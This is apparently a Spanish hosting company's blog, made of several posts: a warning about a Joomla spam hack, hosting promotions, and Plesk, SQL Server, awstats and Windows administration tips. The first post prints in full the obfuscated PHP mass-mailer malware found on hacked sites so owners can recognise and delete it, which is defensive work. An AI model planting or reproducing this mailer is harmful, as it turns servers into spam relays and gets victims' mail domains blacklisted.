¿Sospechas que alguien ha hackeado tu Joomla, y está utilizándolo para realizar envíos masivos de correo spam?

Es probable que el hack en cuestión tenga forma de archivo .php, y se encuentre mezclado con el resto de los archivos de tu página web. El nombre del archivo es completamente aleatorio, y no afecta a su funcionamiento. Lo importante es el código dentro del mismo, que tiene este aspecto:

<?php
@error_reporting(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); if (count($_POST) < 2) { die(PHP_OS.chr(49).chr(48).chr(43).md5(0987654321)); } $v5031e998 = false; foreach (array_keys
($_POST) as $v3c6e0b8a) { switch ($v3c6e0b8a[0]) { case chr(108): $vd56b6998 = $v3c6e0b8a; break; case chr(100): $v8d777f38 = $v3c6e0b8a; break; case chr(109): $v3d26b0b1 = $v3c6e0b8a; break; ca
se chr(101); $v5031e998 = true; break; } } if ($vd56b6998 === '' || $v8d777f38 === '') die(PHP_OS.chr(49).chr(49).chr(43).md5(0987654321)); $v619d75f8 = preg_split('/\,(\ +)?/', @ini_get('disabl
e_functions')); $v01b6e203 = @$_POST[$vd56b6998]; $v8d777f38 = @$_POST[$v8d777f38]; $v3d26b0b1 = @$_POST[$v3d26b0b1]; if ($v5031e998) { $v01b6e203 = n9a2d8ce3($v01b6e203); $v8d777f38 = n9a2d8ce3
($v8d777f38); $v3d26b0b1 = n9a2d8ce3($v3d26b0b1); } $v01b6e203 = urldecode(stripslashes($v01b6e203)); $v8d777f38 = urldecode(stripslashes($v8d777f38)); $v3d26b0b1 = urldecode(stripslashes($v3d26
b0b1)); if (strpos($v01b6e203, ';', 1) != false) { list($va3da707b, $vbfbb12dc, $v081bde0c) = preg_split('/;/',strtolower($v01b6e203)); $va3da707b = ucfirst($va3da707b); $vbfbb12dc = ucfirst($vb
fbb12dc); $v3a5939e4 = next(explode('@', $v081bde0c)); if ($vbfbb12dc == '' || $va3da707b == '') { $vbfbb12dc = $va3da707b = ''; $v01b6e203 = $v081bde0c; } else { $v01b6e203 = "\"$va3da707b $vbf
bb12dc\" <$v081bde0c>"; } } else { $vbfbb12dc = $va3da707b = ''; $v081bde0c = strtolower($v01b6e203); $v3a5939e4 = next(explode('@', $v01b6e203)); } preg_match('|<USER>(.*)</USER>|imsU', $v8d777
f38, $vee11cbb1); $vee11cbb1 = $vee11cbb1[1]; preg_match('|<NAME>(.*)</NAME>|imsU', $v8d777f38, $vb068931c); $vb068931c = $vb068931c[1]; preg_match('|<SUBJ>(.*)</SUBJ>|imsU', $v8d777f38, $vc3448
7c9); $vc34487c9 = $vc34487c9[1]; preg_match('|<SBODY>(.*)</SBODY>|imsU', $v8d777f38, $v6f4b5f42); $v6f4b5f42= $v6f4b5f42[1]; $vc34487c9 = str_replace("%R_NAME%", $va3da707b, $vc34487c9); $vc344
87c9 = str_replace("%R_LNAME%", $vbfbb12dc, $vc34487c9); $v6f4b5f42 = str_replace("%R_NAME%", $va3da707b, $v6f4b5f42); $v6f4b5f42 = str_replace("%R_LNAME%", $vbfbb12dc, $v6f4b5f42); $v0897acf4 =
preg_replace('/^(www|ftp)\./i', '', @$_SERVER['HTTP_HOST']); if (ne667da76($v0897acf4) || @ini_get('safe_mode')) $v10497e3f = false; else $v10497e3f = true; $v9a5cb5d8 = "$vee11cbb1@$v0897acf4"
; if ($vb068931c != '') $vd98a07f8 = "$vb068931c <$v9a5cb5d8>"; else $vd98a07f8 = $v9a5cb5d8; $vb8ddc93f = "From: $vd98a07f8\r\n"; $vb8ddc93f .= "Reply-To: $vd98a07f8\r\n"; $v3c87b187 = "X-Prior
ity: 3 (Normal)\r\n"; $v3c87b187 .= "MIME-Version: 1.0\r\n"; $v3c87b187 .= "Content-Type: text/html; charset=\"iso-8859-1\"\r\n"; $v3c87b187 .= "Content-Transfer-Encoding: 8bit\r\n"; if (!in_arr
ay('mail', $v619d75f8)) { if ($v10497e3f) { if (@mail($v01b6e203, $vc34487c9, $v6f4b5f42, $vb8ddc93f.$v3c87b187, "-f$v9a5cb5d8")) die(chr(79).chr(75).md5(1234567890)."+0"); } else { if (@mail($v
01b6e203, $vc34487c9, $v6f4b5f42, $v3c87b187)) die(chr(79).chr(75).md5(1234567890)."+0"); } } $v4340fd73 = "Date: " . @date("D, j M Y G:i:s O")."\r\n" . $vb8ddc93f; $v4340fd73 .= "Message-ID: <"
.preg_replace('/(.{7})(.{5})(.{2}).*/', '$1-$2-$3', md5(time()))."@$v0897acf4>\r\n"; $v4340fd73 .= "To: $v01b6e203\r\n"; $v4340fd73 .= "Subject: $vc34487c9\r\n"; $v4340fd73 .= $v3c87b187; $v841a
2d68 = $v4340fd73."\r\n".$v6f4b5f42; if ($v3d26b0b1 == '') $v3d26b0b1 = n9c812bad($v3a5939e4); if (($vb4a88417 = n7b0ecdff($v9a5cb5d8, $v081bde0c, $v841a2d68, $v0897acf4, $v3d26b0b1)) == 0) { di
e(chr(79).chr(75).md5(1234567890)."+1"); } else { echo PHP_OS.chr(50).chr(48).'+'.md5(0987654321)."+$vb4a88417"; } function ne667da76($v957b527b){ return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0
-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $v957b527b); } function na73fa8bd($vb45cffe0, $v11a95b8a = 0, $v7fa1b685="=\r\n", $v92f21a0f = 0, $v3303c65a
= false) { $vf5a8e923 = strlen($vb45cffe0); $vb4a88417 = ''; for($v865c0c0b = 0; $v865c0c0b < $vf5a8e923; $v865c0c0b++) { if ($v11a95b8a >= 75) { $v11a95b8a = $v92f21a0f; $vb4a88417 .= $v7fa1b6
85; } $v4a8a08f0 = ord($vb45cffe0[$v865c0c0b]); if (($v4a8a08f0 == 0x3d) || ($v4a8a08f0 >= 0x80) || ($v4a8a08f0 < 0x20)) { if ((($v4a8a08f0 == 0x0A) || ($v4a8a08f0 == 0x0D)) && (!$v3303c65a)) {
$vb4a88417.=chr($v4a8a08f0); $v11a95b8a = 0; continue; } $vb4a88417 .='='.str_pad(strtoupper(dechex($v4a8a08f0)), 2, '0', STR_PAD_LEFT); $v11a95b8a += 3; continue; } $vb4a88417 .= chr($v4a8a08f0
); $v11a95b8a++; } return $vb4a88417; } function n7b0ecdff($vd98a07f8, $v01b6e203, $v841a2d68, $v0897acf4, $v3d26b0b1) { global $v619d75f8; if (!in_array('fsockopen', $v619d75f8)) $v66b18866 = @
fsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20); elseif (!in_array('pfsockopen', $v619d75f8)) $v66b18866 = @pfsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20); elseif (!in_array('strea
m_socket_client', $v619d75f8) && function_exists("stream_socket_client")) $v66b18866 = @stream_socket_client("tcp://$v3d26b0b1:25", $v70106d0d, $v809b1abe, 20); else return -1; if (!$v66b18866)
{ return 1; } else { $v8d777f38 = n54070395($v66b18866); @fputs($v66b18866, "EHLO $v0897acf4\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 ) return "2+($v01b6e20
3)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "MAIL FROM:<$vd98a07f8>\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 ) return "3+($v01b
6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "RCPT TO:<$v01b6e203>\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 && substr($ve98d
2f00, 0, 3) != 251) return "4+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "DATA\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) !=
354 ) return "5+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, $v841a2d68."\r\n.\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 25
0 ) return "6+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "QUIT\r\n"); @fclose($v66b18866); return 0; } } function n54070395($v66b18866) { $v8d777f38 = '';
while($v341be97d = @fgets($v66b18866, 4096)) { $v8d777f38 .= $v341be97d; if(substr($v341be97d, 3, 1) == ' ') break; } return $v8d777f38; } function n9c812bad($vad5f82e8) { global $v619d75f8; if
(!in_array('getmxrr', $v619d75f8) && function_exists("getmxrr")) { @getmxrr($vad5f82e8, $v744fa43b, $v6c5ea816); if (count($v744fa43b) === 0) return '127.0.0.1'; $v865c0c0b = array_keys($v6c5ea
816, min($v6c5ea816)); return $v744fa43b[$v865c0c0b[0]]; } else { return '127.0.0.1'; } } function n9a2d8ce3($v1cb251ec) { $v1cb251ec = base64_decode($v1cb251ec); $vc68271a6 = ''; for($v865c0c0b
= 0; $v865c0c0b < strlen($v1cb251ec); $v865c0c0b++) $vc68271a6 .= chr(ord($v1cb251ec[$v865c0c0b]) ^ 2); return $vc68271a6; } ?>

Si encuentras un archivo desconocido fuera de lugar, que tú no has creado y que lleva este código dentro, bórralo inmediatamente.

El riesgo principal, más allá de la seguridad de tu sitio, es que todas las cuentas de correo dependientes de tus dominios entren en listas negras de spam, impidiéndote enviar y recibir correo correctamente. El proceso para salir de las listas negras puede ser largo en el peor de los casos, pudiendo dejar tus cuentas de correo inutilizadas durante varios días.

Para cualquier negocio, la presencia en Internet es cada vez más relevante. Cada vez son más las personas recurren a Internet para buscar servicios, conocer los productos de las empresas y las opiniones que se brindan sobre ellos.

Ahora con Web Presence Builder, cualquier persona podrá construir su propia web siguiendo unos sencillos pasos. Existen infinidad de plantillas y el usuario puede elegir la que mejor se adapte a su servicio o negocio personalizándola por completo con los colores, imágenes y textos que desee.

El plan Click de Blackslot tiene incorporado este servicio.  Los pasos a seguir para utilizar este tipo de plantillas, son muy sencillos:

1) Accede al panel de control del alojamiento y pincha sobre Web Presence Builder

2) Selecciona la plantilla web relacionada con tu tema de interés o tu negocio

3) Rellena la información de contacto

4) A continuación accederás a la plantilla web por defecto.
Al entrar a la aplicación existe un vídeo explicativo con los pasos a seguir para modificar las plantillas.

5) Podrás modificar los textos de tu página web:

6) Podrás cambiar los colores de tu web

7) Podrás incluir nuevos apartados y subapartados en el menú web

8) Podrás incluir las palabras de búsqueda por las que quieres que se indexe tu web (mejora del posicionamiento en buscadores).

Blackslot ha organizado un concurso para emprendedores.

¡¡ 6 MESES DE HOSTING GRATIS !!

El ganador podrá disfrutar de  6 meses de servicios de hosting, de forma gratuita, para “echar a andar” su proyecto web y, posteriormente, podrá beneficiarse de las ventajas de la promoción de startups que tenemos en marcha en la que se aplicará un 50% de descuento sobre cualquiera de nuestros planes de alojamiento.

Participar en el concurso es muy sencillo, bastará con enviar tu frase célebre para emprendedores a través de nuestro formulario o a través de Twitter, utilizando el hashtag #emprendeBS

BASES DEL CONCURSO

Hoy, Blackslot cumple cuatro años.

Solemos celebrar las onomásticas con frases gloriosas. Para esta ocasión hemos elegido la siguiente:

La web debería ser mundial, universal e interplanetaria…

Son muchas las frases que nos hacen sonreír en el día a día y que vamos a seguir anotando en nuestra “pizarra anecdotario” para rememorarlas cada vez que se celebre un nuevo aniversario, porque seguimos pensando en cumplir muchos, pero que muchos más.

Gracias por hacer posible que nuestra pizarra esté siempre llena de buen humor, gracias por vuestra confianza en Blackslot.

Al tratar de hacer un backup de una base de datos pesada en SQL Server desde el panel de control Plesk se produce el siguiente error:

“The timeout period elapsed prior to the completion of the operation or the server is not responding”.

El motivo es que las conexiones remotas tienen un tiempo máximo y sino se completa el proceso se cierra la misma produciéndose así el error.

La mayoría de las veces se soluciona aumentando el tiempo de la conexión que Plesk establece, para hacerlo hay que editar las siguientes entradas en el registro (regedit).

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Plesk\PSA Config\Config\ADOConnectionTimeout
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Plesk\PSA Config\Config\ADOCommandTimeout

Para poner un valor similar al que tiene por defecto SQL Server, podemos ponerlo a 600 y probar.

Si la base de datos es demasiado pesada y queremos permitir hacer backup, tendremos que ajustar además el valor del propio SQL Server por uno más alto, si lo ponemos a 0 será ilimitado.

El comando para ver el timeout es:

EXEC sp_configure

Si queremos cambiarlo por ejemplo a 1000, ejecutamos:

EXEC SP_CONFIGURE 'remote query timeout', 1000
reconfigure

También se puede hacer desde las propiedades de Sql Server > Connections.

Cuando las estadísticas de un servidor no se actualizan es porque ha ocurrido algún error al procesarse. Es conveniente ejecutar el proceso a mano para ver dónde se produce error.

/usr/local/psa/admin/sbin/statistics

Hay varios errores que se pueden dar. En este caso obtenemos el siguiente error:

System error 2: No such file or directory
statistics_collector: Unable to execute /usr/share/awstats/tools/awstats_buildstaticpages.pl -awstatsprog=/usr/share/awstats/wwwroot/cgi-bin/awstats.pl -configdir=/usr/local/psa/etc/awstats -config=dominio.com-https -dir=/var/www/vhosts/dominio.com/statistics/webstat-ssl/current  >/dev/null 2>&1

En /etc/psa/psa.conf revisamos las rutas relativas a awstats y vemos que están mal. La solución pasa por corregirlas y ejecutar de nuevo el script para confirmar que esta vez se ejecuta correctamente.

[root@server psa]# diff psa.conf psa.conf.default
110,111c110,111
AWSTATS_BIN_D /usr/share/awstats/wwwroot/cgi-bin
AWSTATS_TOOLS_D /usr/share/awstats/tools
---
AWSTATS_BIN_D /var/www/cgi-bin/awstats
AWSTATS_TOOLS_D /usr/share/awstats

Por norma general no se debería instalar nada en los servidores a no ser que sea estrictamente necesario, es decir, que el propio sistema no sea capaz de ofrecer la funcionalidad necesaria.

En muchos casos, por el desconocimiento de las herramientas nativas para Windows, los administradores terminan instalando herramientas de terceros como alternativa en Windows llenando el sistema de utilidades que realmente no necesitan, en algunos casos penalizando el rendimiento del server y en el peor de los casos instalando herramientas que llevan detrás “regalitos” con malware.

Un ejemplo, es cuando se pregunta en los foros por algo similar para Windows al comando wget de Linux. En la mayoría de los casos, aparecen respuestas recomendando la instalación de wget de GNU para Windows (http://gnuwin32.sourceforge.net/packages/wget.htm). No digo que no pueda ser útil, pero primero prueba con las utilidades nativas y sino te convencen busca alternativas.

En Powershell disponemos de varias formas de hacer peticiones HTTP o HTTPs a un sitio web:

Ejemplo 1:

PS C:\> Invoke-WebRequest blackslot.com

Ejemplo 2:

(new-object system.net.webclient).downloadstring('http://blackslot.com')

Recomendado jugar con las distintas opciones de estos comandos:

Invoke-WebRequest
WebClient

Nuestros servidores se entregan por defecto con la instalación del idioma original de Windows, vemos más recomendable utilizar el sistema en inglés pero si quieres cambiarlo a Español o cualquier otro puedes hacerlo en unos sencillos pasos, sin reinstalar el sistema.

1) Simplemente se trata de abrir “Language” en el panel de control:

2) Añadir un nuevo idioma

3) Hay que bajarse los paquetes del idioma seleccionado.

4) Finalmente hay que elegir el idioma por defecto que deseamos e iniciar de nuevo sesión.

Queremos celebrar contigo la entrada de la primavera.

Hoy, día 21 de marzo, a las 12:02 estrenaremos el cambio de estación.

Blackslot se engalana con sus mejores trajes de redes, conectores, y megabytes y presenta su nueva colección de:

-  Alojamiento web compartido para un look casual, para quienes quieren alojar su web de manera rápida, sencilla y sin preocupaciones.  Pensado en la comodidad del día a día.

- Alojamiento web para distribuidores para aquellos que quieren contar con diferentes opciones a la hora de personalizar el look de sus clientes.

- Alojamiento web para startups. Un fondo de armario indispensable con el que poder afrontar cualquier situación.

- Servidores VPS para estilos elegantes a la par que informales, porque se salen de la norma, o para aquellos que quieren disponer de un armario vestidor que poder personalizar.

- Servidores CLOUD para aquellos estilos más elaborados y refinados que necesitan estar al día con las exigencias que cada evento les demanda.

Como sabemos lo difícil que es empezar a caminar, desde Blackslot hemos puesto en marcha una promoción  de hosting para emprendedores y nuevos proyectos para facilitar el avance en el camino y la puesta en marcha de un negocio en Internet.

A lo largo de 2012 algunos de los perfiles laborales más demandados estaban relacionados con el mundo tecnológico e Internet: programadores web, expertos en marketing online, en posicionamiento …
Parece que esta tendencia se mantiene a lo largo de 2013, e incluso, se acentuará si tenemos en cuenta las últimas noticias publicadas en torno al mundo de la seguridad informática.

Son muchas las empresas que comienzan a aumentar el gasto en seguridad informática, y cada vez más países destinan partidas de sus presupuestos generales a tareas relacionadas con este sector.
Si a esto le unimos que Internet se ha convertido en un medio para poner en marcha muchos negocios sin necesidad de tener que realizar grandes desembolsos de partida,  a día de hoy, la red se presenta como un medio GENERADOR DE OPORTUNIDADES.

Si eres emprendedor, si quieres poner en marcha tu proyecto en Internet, podrás conseguir a través de Blackslot todo tipo de planes de alojamiento al 50% (planes básicos, VPS o servidores cloud).